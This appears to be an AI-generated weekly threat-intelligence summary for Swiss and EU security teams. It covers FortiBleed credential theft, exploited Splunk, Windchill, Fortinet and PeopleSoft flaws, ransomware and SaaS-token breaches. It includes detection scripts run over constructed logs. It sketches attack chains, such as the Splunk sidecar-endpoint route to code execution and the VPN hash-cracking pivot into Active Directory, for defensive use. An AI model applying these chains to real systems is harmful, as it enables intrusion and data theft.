ctipilot.ch

CTI Weekly Summary — 2026-W25 (Jun 15 – Jun 21, 2026)

Type: weekly
Date: 2026-W25
Generator: Claude Opus 4.8 (`claude-opus-4-8`)
Classification: TLP:CLEAR
Language: English
Prompt: v2.64
Items: 41
CVEs: 33

0. Week at a glance

  • FortiBleed is the Monday-morning escalation — 86,644 FortiGate credentials validated and a Russian-speaking operator pivoting into Active Directory; CISA issued emergency hardening. Treat any exposed FortiGate's secrets as compromised regardless of patch level. (daily 06-20, SecurityWeek)
  • Splunk CVE-2026-20253 flipped to confirmed exploitation and CISA KEV — a pre-auth RCE on the SIEM backbone many CH/EU SOCs run; patch on emergency cadence. (daily 06-20, Splunk PSIRT)
  • PTC Windchill CVE-2026-12569 — pre-auth deserialization RCE (CVSS 10.0) exploited; BSI phoned operators at 02:30 — a DACH manufacturing/defence emergency. (daily 06-20, Heise)
  • ShinyHunters named the Council of Europe in the Oracle PeopleSoft campaign — a European institution of which Switzerland is a member — while adding Kodak and One Medical to its leak-site pressure. (daily 06-16, SecurityWeek)
  • One dormant OAuth credential at SaaS integrator Klue cascaded into multi-tenant Salesforce CRM theft (Huntress, Recorded Future, Tanium, Jamf and others) — the week's clearest supplier-trust-path lesson. (daily 06-21, ReliaQuest)
  • The AI agent/toolchain control plane became a concrete attack surface — Microsoft's AutoJack (web page → host RCE via an agent's MCP socket) capped a week of LiteLLM, Copilot SearchLeak, Vertex AI and JetBrains-plugin disclosures. (daily 06-20, Microsoft)
  • The Gentlemen RaaS grew +315% in Q1 and impacted OT — ESET exposed its centrally-built GentleKiller EDR-killer; the gang halted milling at Mackay Sugar. (daily 06-19, ESET)
  • Policy: the G7 called PQC an "urgent priority" and the predicted NoName057(16) DDoS hit Swiss-border Haute-Savoie sites; the CRA's first reporting obligation lands 11 September. (ANSSI, Cyberattaque.org)

1. Highest-impact events — what's on fire if no one acted

FortiBleed — Russian-speaking operator cracking 86,644 FortiGate credentials into Active Directory

If you did nothing this week: any internet-facing FortiGate whose admin or SSL VPN credentials are in the "FortiBleed" corpus is a live initial-access foothold right now — patch level is irrelevant, because the leaked credential is the weapon, and the operator is already pivoting from validated VPN logins into internal Active Directory.

The FortiBleed dataset surfaced on 2026-06-17 as 73,932 unique FortiGate management URLs (~75,000 devices across 194 countries) paired with valid VPN and administrative credentials (BleepingComputer, 2026-06-17; daily 06-18). By 2026-06-19 the verified count had grown to 86,644 confirmed working credentials and CISA had issued an emergency hardening advisory (SecurityWeek, 2026-06-19; daily 06-20). Fortinet's PSIRT confirmed the campaign ties to previously disclosed incidents (FG-IR-26-060 / FG-IR-25-647) and that the credentials originated from exported device configurations — its position is that this is not a new CVE, the corpus being a reshare of prior-incident data combined with large-scale brute-forcing (Fortinet PSIRT, 2026-06-19) — but that distinction is cold comfort operationally: the credentials validate. The methodology that emerged this week is the load-bearing detail. A Russian-speaking actor intercepts SSL VPN authentication, cracks the captured hashes on a 45-GPU Hashtopolis cluster, and then uses the recovered service and admin accounts to move laterally into internal Active Directory (T1078 valid accounts following T1110 credential cracking).

The escalation that makes this § 1 rather than a routine credential-leak note is the AD pivot plus CISA's mandated response: terminate all SSL VPN sessions, reset every credential, migrate admin-hash storage from the older MD5-crypt scheme to PBKDF2, and enforce phishing-resistant MFA on all remote access. FortiGate is ubiquitous on Swiss and EU public-sector and telco perimeters, so treat any exposed device's local admin and VPN secrets as potentially in the corpus regardless of firmware version. Hunt for sequential VPN authentication failures from rotating residential IP ranges followed by a success and immediate internal RDP/SMB/LDAP reconnaissance, and cross-reference SSL VPN session logs against the Shadowserver notification feed.
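
The hunt described above, as an added example that is not part of the original summary or of any vendor advisory: a Python script that runs over constructed FortiGate-style SSL VPN and traffic log lines and flags a tunnel-up that follows a burst of login failures from several source IPs, then lists any SMB/LDAP/RDP first-touch traffic from the assigned tunnel IP. The log lines, users and IPs are constructed; the field names follow FortiGate's key=value syslog style, and the thresholds (5 failures, 3 distinct IPs, 30-minute and 15-minute windows) are assumptions to tune against your own baseline.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed FortiGate-style key=value log lines (invented users, IPs and times; not
# real device output). Field names follow FortiGate's syslog conventions.
SAMPLE_LOGS = """\
date=2026-06-19 time=03:10:02 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.10 user="svc_backup" reason="sslvpn_login_permission_denied"
date=2026-06-19 time=03:10:41 type="event" subtype="vpn" action="ssl-login-fail" remip=198.51.100.22 user="svc_backup" reason="sslvpn_login_permission_denied"
date=2026-06-19 time=03:11:15 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.77 user="svc_backup" reason="sslvpn_login_permission_denied"
date=2026-06-19 time=03:12:03 type="event" subtype="vpn" action="ssl-login-fail" remip=192.0.2.15 user="svc_backup" reason="sslvpn_login_permission_denied"
date=2026-06-19 time=03:12:44 type="event" subtype="vpn" action="ssl-login-fail" remip=198.51.100.22 user="svc_backup" reason="sslvpn_login_permission_denied"
date=2026-06-19 time=03:13:20 type="event" subtype="vpn" action="tunnel-up" remip=192.0.2.15 tunnelip=10.212.134.200 user="svc_backup" msg="SSL tunnel established"
date=2026-06-19 time=03:14:05 type="traffic" subtype="forward" srcip=10.212.134.200 dstip=10.0.0.5 dstport=445 proto=6 action="accept"
date=2026-06-19 time=03:14:09 type="traffic" subtype="forward" srcip=10.212.134.200 dstip=10.0.0.10 dstport=389 proto=6 action="accept"
date=2026-06-19 time=03:15:30 type="traffic" subtype="forward" srcip=10.212.134.200 dstip=10.0.0.7 dstport=3389 proto=6 action="accept"
date=2026-06-19 time=08:00:12 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.200 user="alice" reason="sslvpn_login_permission_denied"
date=2026-06-19 time=08:00:40 type="event" subtype="vpn" action="tunnel-up" remip=203.0.113.200 tunnelip=10.212.134.201 user="alice" msg="SSL tunnel established"
date=2026-06-19 time=08:03:00 type="traffic" subtype="forward" srcip=10.212.134.201 dstip=10.0.0.50 dstport=443 proto=6 action="accept"
""".splitlines()

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Ports whose first touch right after a VPN login looks like AD / host reconnaissance.
RECON_PORTS = {"88": "Kerberos", "135": "RPC", "389": "LDAP", "445": "SMB", "636": "LDAPS", "3389": "RDP"}


def parse_line(line):
    """Split one key=value line into a dict and add a parsed 'ts' datetime."""
    rec = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
    return rec


def hunt_credential_stuffing_pivot(lines, min_failures=5, min_distinct_ips=3,
                                   fail_window=timedelta(minutes=30),
                                   recon_window=timedelta(minutes=15)):
    """Flag tunnel-up events preceded by a burst of failures from several source IPs,
    then enrich each with any recon-port traffic from the assigned tunnel IP."""
    events = sorted((parse_line(ln) for ln in lines if ln.strip()), key=lambda e: e["ts"])
    traffic = [e for e in events if e.get("type") == "traffic"]
    failures = defaultdict(list)          # user -> [(ts, source ip), ...]
    findings = []
    for e in events:
        if e.get("subtype") != "vpn":
            continue
        user = e.get("user", "?")
        if e.get("action") == "ssl-login-fail":
            failures[user].append((e["ts"], e.get("remip")))
        elif e.get("action") == "tunnel-up":
            recent = [(t, ip) for t, ip in failures[user] if e["ts"] - t <= fail_window]
            sources = {ip for _, ip in recent}
            if len(recent) < min_failures or len(sources) < min_distinct_ips:
                continue                   # ordinary typo-then-success pattern
            tunnel_ip = e.get("tunnelip")
            recon = [(t["ts"].strftime("%H:%M:%S"), t["dstip"], RECON_PORTS[t["dstport"]])
                     for t in traffic
                     if t.get("srcip") == tunnel_ip and t.get("dstport") in RECON_PORTS
                     and timedelta(0) <= t["ts"] - e["ts"] <= recon_window]
            findings.append({
                "user": user,
                "login_time": e["ts"].isoformat(),
                "success_ip": e.get("remip"),
                "failures": len(recent),
                "distinct_source_ips": len(sources),
                "tunnel_ip": tunnel_ip,
                "recon": recon,
                "severity": "high" if recon else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in hunt_credential_stuffing_pivot(SAMPLE_LOGS):
        print(f"[{f['severity']}] {f['user']}: {f['failures']} failures from "
              f"{f['distinct_source_ips']} IPs, then {len(f['recon'])} recon connection(s)")
```

The script counts distinct source IPs rather than classifying them as residential; to get the "rotating residential ranges" signal the paragraph describes, enrich `remip` with ASN or IP-reputation data before applying the distinct-IP threshold. Medium-severity findings (burst then success, no recon yet) are still worth a credential reset, since the leaked credential is the weapon regardless of what follows.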

CVE-2026-20253 — Splunk Enterprise pre-auth RCE flips to confirmed exploitation and CISA KEV

If you did nothing this week: if you run an internet-reachable Splunk Enterprise search head on 10.0.x or 10.2.x, you are now exposed to an unauthenticated remote-code-execution path that is being exploited in the wild — and a compromised search head sits at the centre of your detection and log visibility.

When CVE-2026-20253 (CVSS 9.8, CWE-306) was first covered on 2026-06-14 it was a disclosure-plus-patch story. This week Splunk PSIRT confirmed limited exploitation, CISA added it to the KEV catalog on 2026-06-18, and NCSC-NL corroborated (Splunk PSIRT SVD-2026-0603; SecurityWeek, 2026-06-19; daily 06-20). The flaw is an unauthenticated arbitrary file-creation/truncation primitive reachable through a PostgreSQL sidecar service endpoint that lacks authentication controls, chaining to RCE. It affects Splunk Enterprise 10.0 below 10.0.7 and 10.2 below 10.2.4; fixes (10.4.0 / 10.2.4 / 10.0.7) have been available since 2026-06-14.

The operational weight here is the platform, not the CVSS: Splunk is a standard SIEM backbone inside CH/EU public-sector SOCs, and an attacker who lands pre-auth code execution on the search-head tier owns the analytics plane that defenders rely on. Patch on emergency cadence, restrict search-job submission to authorised analyst accounts, and verify indexer/search-head network segmentation so the PostgreSQL sidecar is not network-reachable from untrusted zones.

Changes since first coverage (2 prior appearances)
  1. 2026-06-20: Splunk PSIRT + NCSC-NL confirm limited targeted exploitation in the wild
  2. 2026-06-14: Deep dive + § 2. Sidecar PostgreSQL Go REST API (loopback 5435) proxied via /en-US/splunkd/__raw/v1/postgres/ with empty Basic creds -> SQL injection in backup/restore -> RCE. Splunk-on-AWS default-vulnerable. T1190/T1059. No ITW yet. Fixed 10.4.0/10.2.4/10.0.7.

CVE-2026-12569 — PTC Windchill / FlexPLM pre-auth deserialization RCE, exploited, BSI calling admins at 02:30

If you did nothing this week: if you run an internet-reachable PTC Windchill or FlexPLM instance, assume compromise — a pre-auth deserialization flaw on the login interface is being exploited to drop backdoors, and the German BSI considered it urgent enough to phone operators in the middle of the night.

CVE-2026-12569 (CVSS 3.1 10.0; CVSS 4.0 9.3) is an unsafe deserialization of untrusted data reachable on the web-based Windchill/FlexPLM login interface before authentication — no credentials, no prior foothold, no user interaction (NCSC-CH Security Hub, 2026-06-19; daily 06-20 deep dive). PTC shipped fixes on 2026-06-15 and auto-patched cloud tenants; affected on-premises builds span the 11.x, 12.0.x, 12.1.x, 13.0.x and 13.1.0.0–13.1.3.0 lines as well as releases prior to 11.0 M030 (PTC PSIRT). Both BSI and NCSC-CH treat it as actively exploited, with Heise reporting backdoor deployment on vulnerable servers and the BSI escalating to direct after-hours phone calls — a step reserved for its highest-urgency advisories (Heise Security, 2026-06-19).

Windchill and FlexPLM are the product-lifecycle-management backbone across DACH manufacturing, aerospace, automotive and the defence-industrial base, holding engineering crown jewels (CAD, BOMs, supplier data) behind increasingly internet-reachable supplier portals — which is exactly why the BSI mobilised. Patch every on-premises instance, confirm cloud tenants were auto-patched, and until then pull the login interface off the internet behind a VPN or authenticating reverse proxy. Hunt for Java deserialization exception bursts on the login path and for the Windchill application-server process (JBoss/WildFly/WebLogic) spawning shells or scripting interpreters (T1190, T1505.003).

Changes since first coverage (1 prior appearance)
  1. 2026-06-20: First coverage — actively-exploited CVSS 10.0 pre-auth deserialization RCE; BSI emergency outreach; Immediate Action + deep dive

2. Multi-day campaigns and chains

ShinyHunters extortion brand — Council of Europe named, Kodak and One Medical added to the leak-site pressure

The ShinyHunters extortion brand (the data-theft cluster Google tracks as UNC6240) ran on two fronts this week. The technical core remains the Oracle PeopleSoft zero-day campaign (CVE-2026-35273) consolidated in the W24 weekly, and Google's Threat Intelligence Group sharpened it this week: GTIG's analysis confirms UNC6240 exploited the flaw between 27 May and 9 June as a zero-day, has notified 100+ organisations (68% in higher education), and documented the TTPs — JSP shell implant, a customised MeshCentral agent masquerading as Azure cloud endpoints, [victim]_fanout.sh SSH credential-spraying and zstd-compressed exfiltration (Google GTIG). On 2026-06-16 ShinyHunters listed the Council of Europe — the 46-member Strasbourg human-rights body of which Switzerland is a member — claiming roughly 297 GB exfiltrated; per W1's assessment it is the only named European-institution victim in the campaign to date (SecurityWeek, 2026-06-16; daily 06-16). In parallel the brand expanded its leak-site extortion pressure beyond PeopleSoft: Eastman Kodak confirmed on 2026-06-17 that "an unauthorized third party illegally gained access to a limited amount of company data" after a ShinyHunters listing (SecurityWeek, 2026-06-19; daily 06-20), and Amazon's One Medical confirmed a legacy third-party file-storage breach while ShinyHunters' unverified 8.8 TB claim ran a deadline that expired 2026-06-21 (BankInfoSecurity, 2026-06-20; daily 06-21).

The cross-day pattern for a CH/EU SOC: the same brand is simultaneously running a confirmed enterprise-SaaS zero-day (PeopleSoft, vendor-confirmed) and a higher-noise leak-site operation where claims (Kodak data volume, the One Medical 8.8 TB figure) are attacker-asserted and partly unverified. Triage the two differently — the PeopleSoft exposure is a patch-and-hunt emergency for internet-reachable instances; the leak-site listings warrant victim-notification monitoring but the headline data volumes should be treated as unconfirmed until the victim corroborates.

Changes since first coverage (7 prior appearances)
  1. 2026-06-20
  2. 2026-06-18
  3. 2026-06-16
  4. 2026-06-14 (2026-W24 weekly)
  5. 2026-06-14
  6. 2026-06-13
  7. 2026-06-12

The Gentlemen — EDR-killer framework documented, OT-adjacent victim claimed, operator named

The Gentlemen RaaS operation moved from tooling disclosure to victim impact to attribution across three days. On 2026-06-18 ESET published a months-long investigation showing the gang centrally builds and maintains its affiliates' GentleKiller EDR-killer framework — a structural departure from the affiliate norm in which each affiliate sources its own evasion tooling (ESET, 2026-06-19; daily 06-19). On 2026-06-18 Mackay Sugar — Australia's second-largest sugar producer — confirmed an intrusion around 10 June that halted milling at two of three mills, an OT-adjacent impact the group later claimed (The Record, 2026-06-18; daily 06-20). Separately, KrebsOnSecurity published OSINT attribution identifying the group's administrator ("Hastalamuerte" / "Zeta88") as a 36-year-old from Izhevsk, Russia, who reportedly uses AI tooling to develop ransomware and assist post-exploitation (KrebsOnSecurity, 2026-06-10).

The defender signal is the centralised EDR-killer model: because the BYOVD evasion tooling is built once and pushed to all affiliates, detection content that catches GentleKiller's driver-load and EDR-tamper behaviour generalises across every affiliate intrusion rather than needing per-affiliate tuning. The Krebs attribution is an analytical claim, not an indictment — treat it as context, not actionable IOC.

Klue / Icarus — one dormant integration credential cascades into multi-tenant Salesforce CRM theft

The Icarus extortion actor turned a single legacy credential at a SaaS integration vendor into bulk CRM theft across that vendor's customer base. First covered 2026-06-19: Icarus (active since ~April 2026) compromised the backend of Klue Battlecards — a competitive-intelligence SaaS that integrates with customer Salesforce tenants over OAuth — obtained a dormant/prototype-integration credential, injected code into Klue's application layer to harvest each customer's stored Salesforce OAuth access tokens, then queried the Salesforce REST API directly for ~24 hours per victim before Salesforce flagged the anomaly (ReliaQuest, 2026-06-17; daily 06-19). By 2026-06-21 the named victim list had grown to include Huntress, Recorded Future, Tanium and Jamf, the harvested tokens spanned Salesforce plus Gong, HubSpot and SharePoint, and Huntress forensics tied the abuse to Salesforce REST calls at /services/data/v59.0/query/ carrying a python-urllib User-Agent (Klue, 2026-06-19; Huntress, 2026-06-18; daily 06-21).

The chain — compromise an integration platform's legacy credential, harvest downstream OAuth tokens, query customer CRM APIs from the platform's legitimate IP range (T1199, T1528, T1078.004, T1530) — bypasses every endpoint and network control the victim operates, and is the same trust-path class as the broader Salesforce-OAuth extortion wave. For CH/EU SOCs the takeaway is governance of delegated-OAuth grants: inventory and revoke dormant third-party SaaS integrations, enforce IP restrictions and short token TTLs on connected-app policies, and stream Salesforce Event Monitoring for non-user API principals and python-urllib-style callers.
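
The Event Monitoring review the paragraph recommends, as an added example (not code from ReliaQuest, Huntress, Klue or the original summary), run over constructed rows: it aggregates API calls per principal and flags scripted user agents, bulk volume on the query endpoint, and calls from outside a connected app's IP allow-list. The column names are a simplification, not Salesforce's exact EventLogFile schema; the user IDs, IPs, allow-list range and the 5,000-row threshold are invented. The constructed attacker traffic deliberately comes from inside the integrator's allowed range, so the example also shows why the IP restriction alone does not catch this trust-path abuse.

```python
import csv
import io
import ipaddress
import re
from collections import defaultdict

# Constructed rows loosely shaped like a Salesforce EventLogFile export. The column names
# are a simplification for this example, not the exact Salesforce schema; IDs, IPs and
# row counts are invented.
SAMPLE_EVENT_LOG = """\
TIMESTAMP_DERIVED,USER_ID,USER_TYPE,CLIENT_IP,METHOD,URI,USER_AGENT,ROWS_PROCESSED
2026-06-17T01:02:11Z,005AAA000000INTG,Integration,203.0.113.40,GET,/services/data/v59.0/query/,python-urllib/3.11,2000
2026-06-17T01:02:40Z,005AAA000000INTG,Integration,203.0.113.40,GET,/services/data/v59.0/query/,python-urllib/3.11,2000
2026-06-17T01:03:09Z,005AAA000000INTG,Integration,203.0.113.40,GET,/services/data/v59.0/query/,python-urllib/3.11,2000
2026-06-17T01:03:37Z,005AAA000000INTG,Integration,203.0.113.40,GET,/services/data/v59.0/query/,python-urllib/3.11,2000
2026-06-17T09:15:03Z,005AAA000000HUMN,Standard,198.51.100.9,GET,/services/data/v59.0/sobjects/Account/001xx000003DGb0,Mozilla/5.0 (Windows NT 10.0) Salesforce Lightning,1
2026-06-17T09:16:10Z,005AAA000000INTG,Integration,203.0.113.41,POST,/services/data/v59.0/sobjects/Contact,IntegratorSync/4.2,1
2026-06-17T09:20:55Z,005AAA000000HUMN,Standard,198.51.100.9,GET,/services/data/v59.0/query/,Mozilla/5.0 (Windows NT 10.0) Salesforce Lightning,120
"""

# Source ranges permitted for each integration principal (constructed, mirroring a
# connected-app IP restriction). The attacker rows above sit inside this range on purpose.
INTEGRATION_IP_ALLOWLIST = {"005AAA000000INTG": ["203.0.113.0/24"]}

SCRIPTED_UA = re.compile(r"python-urllib|python-requests|curl/|go-http-client|okhttp|aiohttp", re.I)
QUERY_URI = re.compile(r"^/services/data/v\d+\.\d+/query/?")


def detect_token_abuse(csv_text, allowlist=None, bulk_rows=5000):
    """Return one finding per principal that shows scripted, bulk or off-allowlist API use."""
    allowlist = INTEGRATION_IP_ALLOWLIST if allowlist is None else allowlist
    stats = defaultdict(lambda: {"query_rows": 0, "scripted_hits": 0, "ips": set(),
                                 "off_allowlist": set(), "user_type": None})
    for row in csv.DictReader(io.StringIO(csv_text)):
        s = stats[row["USER_ID"]]
        s["user_type"] = row["USER_TYPE"]
        s["ips"].add(row["CLIENT_IP"])
        if QUERY_URI.match(row["URI"]):
            s["query_rows"] += int(row["ROWS_PROCESSED"])
        if SCRIPTED_UA.search(row["USER_AGENT"]):
            s["scripted_hits"] += 1
        nets = allowlist.get(row["USER_ID"])
        if nets and not any(ipaddress.ip_address(row["CLIENT_IP"]) in ipaddress.ip_network(n)
                            for n in nets):
            s["off_allowlist"].add(row["CLIENT_IP"])

    findings = []
    for user, s in stats.items():
        reasons = []
        if s["scripted_hits"]:
            reasons.append("scripted_user_agent")      # python-urllib-style bulk client
        if s["query_rows"] >= bulk_rows:
            reasons.append("bulk_query_volume")        # CRM export rather than sync traffic
        if s["off_allowlist"]:
            reasons.append("outside_ip_allowlist")
        if reasons:
            findings.append({
                "user": user,
                "user_type": s["user_type"],
                "reasons": reasons,
                "query_rows": s["query_rows"],
                "source_ips": sorted(s["ips"]),
                "action": "revoke the connected app's access and refresh tokens for this principal",
            })
    return findings


if __name__ == "__main__":
    for f in detect_token_abuse(SAMPLE_EVENT_LOG):
        print(f"{f['user']} ({f['user_type']}): {', '.join(f['reasons'])}; "
              f"{f['query_rows']} rows via query from {f['source_ips']}")
```

Run against a real export, the threshold and the user-agent list are the two knobs to tune: legitimate integrators often use recognisable SDK agents, so an unexpected generic client on a principal that normally presents the integrator's own agent string is itself a signal, even before the row count crosses the bulk threshold.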

3. Vulnerability roll-up

CVE-2026-0257 — Palo Alto Networks PAN-OS GlobalProtect: authentication bypass under active exploitation

First disclosed in May and KEV-listed on 2026-05-29, the GlobalProtect portal/gateway authentication bypass moved into a confirmed exploitation wave this week. Unit 42 observed active exploitation by an unidentified actor attempting to access GlobalProtect, with Arctic Wolf reporting increasing exploitation volume and NCSC-CH refreshing its advisory on 2026-06-16 (Unit 42; daily 06-17). Notably, Unit 42 states no post-access lateral movement had been identified as of its analysis — so the current operational signal is unauthorised VPN session establishment, not yet confirmed downstream compromise. Patch to the fixed PAN-OS trains, and hunt GlobalProtect logs for authentications that bypass the expected portal flow.

Changes since first coverage (3 prior appearances)
  1. 2026-06-17: UPDATE: Unit42 active-exploitation confirmation; Arctic Wolf Impacket; NCSC-CH advisory refresh 06-16
  2. 2026-06-10: UPDATE (orig 2026-05-30). Unit 42 2026-06-09 confirms attacker-established gateway sessions; was 'exploit attempts'.
  3. 2026-05-30: Active ITW exploitation, CISA KEV 2026-05-29; deep dive coverage

CVE-2026-20262 — Cisco Catalyst SD-WAN Manager: authenticated arbitrary file write to root, exploited as a zero-day (CISA KEV)

A path-traversal weakness in the web UI of Cisco Catalyst SD-WAN Manager (formerly vManage) lets an authenticated remote attacker create or overwrite any file on the underlying OS and escalate to root code execution; Cisco patched it after zero-day exploitation and CISA added it to KEV (Cisco PSIRT; daily 06-16). SD-WAN Manager is the centralised control plane for an entire SD-WAN fabric, so a rooted controller is a fabric-wide compromise. Patch on emergency cadence and restrict management-plane access to a dedicated administrative network.

Changes since first coverage (1 prior appearance)
  1. 2026-06-16: Deep dive. Authenticated path traversal -> JSP/WAR webshell -> root; KEV 2026-06-15; UAT-8616.

CVE-2026-48907 — Joomla Content Editor (JCE): unauthenticated profile-import to PHP RCE (CVSS 4.0 10.0, CISA KEV)

JCE is one of the most widely installed Joomla editors across European universities, municipalities and community portals. CVE-2026-48907 chains weaknesses in the profile-import workflow into unauthenticated PHP remote code execution, is rated CVSS 4.0 10.0, and was KEV-listed on 2026-06-16 (Widget Factory / JCE; YesWeHack; daily 06-17). Update to JCE 2.9.99.5 or later; the vendor also shipped a free patch for older sites.

Changes since first coverage (1 prior appearance)
  1. 2026-06-17: First coverage; Immediate Action; CVSS 10 unauth RCE, KEV 06-16, automated attacks

CVE-2026-54420: LiteSpeed cPanel/WHM plugin symlink mishandling on CloudLinux/CageFS shared hosting, exploited (CISA KEV)

The LiteSpeed cPanel plugin before 2.4.8 mishandles user-supplied symlinks on CloudLinux/CageFS shared hosting, letting a user with FTP or web-shell access escalate; it is exploited in the wild and KEV-listed (LiteSpeed; daily 06-16). Relevant to any public-sector or education entity running shared cPanel hosting. Update to the LiteSpeed WHM PlugIn version 5.3.2.1.

Changes since first coverage (1 prior appearance)
  1. 2026-06-16

CVE-2026-25089 / CVE-2026-39808 / CVE-2026-39813 — FortiSandbox: three critical flaws exploited in one 24-hour window

What was disclosure-only on 06-12 became active exploitation this week: Defused Cyber reported three FortiSandbox flaws exploited within a single 24-hour window — a JRPC OS command injection (CVE-2026-39808, 9.8), a JRPC path-traversal/auth-bypass (CVE-2026-39813, 9.1), and the web-UI command injection (CVE-2026-25089, 9.8) (Security Affairs; daily 06-17). FortiSandbox supplies the verdicts FortiGate, FortiMail, FortiProxy and FortiClient consume, so a compromised sandbox can suppress detection across the dependent Fortinet stack. The CVE-2026-25089 in-the-wild exploit appears AI-generated and faulty yet still finds traction against unpatched interfaces; Fortinet has not officially confirmed exploitation. Patch all three and restrict management-interface exposure.

Changes since first coverage (2 prior appearances)
  1. 2026-06-17: UPDATE: exploitation now confirmed (was disclosure-only 06-12)
  2. 2026-06-12: First coverage. VNC-launch handler command injection; fixed 5.0.6/4.4.9; CCB+NCSC-NL advisories.

CVE-2026-4020 — Gravity SMTP WordPress plugin: unauthenticated credential dump, mass-exploited

An unauthenticated information-disclosure flaw in the Gravity SMTP plugin (all versions through 2.1.4) lets an attacker dump the configured email-connector credentials (SMTP, SendGrid, Mailgun and similar API keys), and it is being mass-exploited (GitHub Advisory GHSA-jxfc-8wcq-xxcg; daily 06-21). Stolen mail-sending credentials enable downstream phishing from a trusted domain. Update the plugin and rotate every credential stored in it.

Changes since first coverage (1 prior appearance)
  1. 2026-06-21

CVE-2026-50751 — Check Point Security Gateway IKEv1 VPN authentication bypass: public PoC, Qilin affiliate use

Status update on the W24 § 1 item: NCSC-NL updated its advisory on 2026-06-16 to note public proof-of-concept code is now available for the IKEv1 VPN authentication bypass, which a Qilin ransomware affiliate has used for initial access (Help Net Security; NCSC-NL NCSC-2026-0179; daily 06-17). A Remote Access VPN gateway still running the deprecated IKEv1 path is an active ransomware entry point. Apply the Check Point hotfix and disable IKEv1 where IKEv2 can replace it.

Changes since first coverage (3 prior appearances)
  1. 2026-06-17: UPDATE: public PoC now available (NCSC-NL 06-16); exploitation risk elevated
  2. 2026-06-14 (2026-W24 weekly): Consolidated in § 1; Qilin affiliate exploiting IKEv1 auth-bypass
  3. 2026-06-09: First coverage + Immediate Action callout + deep dive. Pre-auth IKEv1 cert-validation bypass, CVSS 9.3, actively exploited by Qilin affiliate since 2026-05-07, CISA KEV, NCSC-CH Action-Required advisory.

CVE-2026-46978 / CVE-2026-35278 — Oracle June 2026 CSPU: unauthenticated Solaris RAD flaw (10.0) and PeopleSoft RCE (9.8)

Oracle's June Critical Security Patch Update shipped 245 fixes on 2026-06-17, around 100 remotely exploitable without authentication, headlined by an unauthenticated Solaris Remote Administration Daemon flaw (CVE-2026-46978, CVSS 10.0) and a PeopleSoft RCE (CVE-2026-35278, 9.8) (Oracle CSPU; daily 06-18). The PeopleSoft fix lands in the middle of the ShinyHunters PeopleSoft campaign (§ 2) — prioritise PeopleSoft and any internet-reachable Solaris RAD instances.

Changes since first coverage (1 prior appearance)
  1. 2026-06-18

CVE-2026-20181 / CVE-2026-20190 — Cisco Identity Services Engine: unauthenticated credential read chaining to root command execution

Two flaws in Cisco ISE and the ISE Passive Identity Connector let an unauthenticated attacker read credentials (CVE-2026-20181, 9.1) that chain to authenticated root command execution (CVE-2026-20190, 7.5); BSI flagged the pair for DACH operators (Cisco PSIRT; daily 06-19). ISE is the network-access-control and policy backbone in many enterprise and public-sector networks — a rooted ISE undermines NAC posture wholesale. Patch promptly.

Changes since first coverage (1 prior appearance)
  1. 2026-06-19

CVE-2026-0647 et al. — Rockwell Automation FLEX I/O unauthenticated password reset (9.4) and Logix CIP DoS, flagged by NCSC-CH

Rockwell disclosed five ICS CVEs on 2026-06-16, consolidated by NCSC-CH on 2026-06-17 and CISA ICS-CERT, headlined by an unauthenticated FLEX I/O password reset (CVE-2026-0647, 9.4) and Logix CIP denial-of-service flaws (CISA ICS-CERT ICSA-26-167-05; NCSC-CH Security Hub; daily 06-18). Directly relevant to Swiss/EU energy, water and manufacturing OT operators. Patch on the OT change-management cycle and verify these controllers are not reachable from IT networks.

Changes since first coverage (1 prior appearance)
  1. 2026-06-18

CVE-2026-55803 / CVE-2026-55804 — Drupal core: PHP object-injection chain in JSON:API, BSI-rated critical

The Drupal Security Team published six advisories on 2026-06-17 (fixed in 10.5.12, 10.6.11, 11.2.14, 11.3.12); BSI escalated the aggregate to kritisch (Drupal SA-CORE-2026-005; BSI CERT-Bund; daily 06-19). Drupal runs a large share of European government and university sites, making this a public-sector CMS patch priority. Update core immediately.

Changes since first coverage (1 prior appearance)
  1. 2026-06-19

4. Sector & victim patterns

Public administration — named European institutions and government data in the firing line

The public sector again carried high-severity activity on multiple vectors. The Council of Europe — a Strasbourg human-rights body of which Switzerland is a member — was named in the ShinyHunters PeopleSoft campaign (§ 2). Iran-aligned Handala breached California Water Service through an internet-exposed RTKBase GNSS platform, leaking billing PII for ~2M customers though without OT access (SecurityWeek, 2026-06-14; daily 06-15). Texas Parks & Wildlife disclosed a third-party-vendor breach exposing 3.08M licence holders' names and driver's-licence numbers (BleepingComputer, 2026-06-18; daily 06-21). And the recurring lesson for CH/EU administration is the PTC Windchill emergency (§ 1), where the BSI's after-hours calls underline how government CERTs are now treating internet-exposed public-sector and industrial software.

Education — exposed CMS and forum software stack a structural risk

Education entities sat under two pressures this week: the continuing ShinyHunters PeopleSoft campaign that W24 documented landing disproportionately on universities, and a cluster of critical web-application CVEs in software ubiquitous across European universities and student communities — JCE for Joomla (CVE-2026-48907, exploited), phpBB (CVE-2026-48611), Drupal core (CVE-2026-55803, BSI critical) and LiteSpeed shared-hosting (CVE-2026-54420, exploited), all in § 3. The pattern is not a single incident but an attack-surface concentration: the open-source CMS/forum/hosting stack that the education sector runs widely all took critical, partly-exploited disclosures in one week.

Healthcare — third-party exposure and a 16-month notification gap

Healthcare breaches this week were dominated by third-party and disclosure-timing failures rather than direct perimeter compromise. iRhythm filed an SEC 8-K reporting data theft via social engineering of a third-party-hosted application (SEC 8-K, 2026-06-15; daily 06-16). HCRG Care Group began notifying patients in June 2026 of a Medusa ransomware attack that occurred in February 2025 — a 16-month gap between incident and notification (HIPAA Pulse, 2026-06-20; daily 06-21). Amazon's One Medical confirmed a legacy-storage breach (§ 2). The defender takeaway: most healthcare exposure this week entered through suppliers and legacy systems, not the front door.

Energy, water & OT — perimeter and process failures, with an OT-adjacent halt

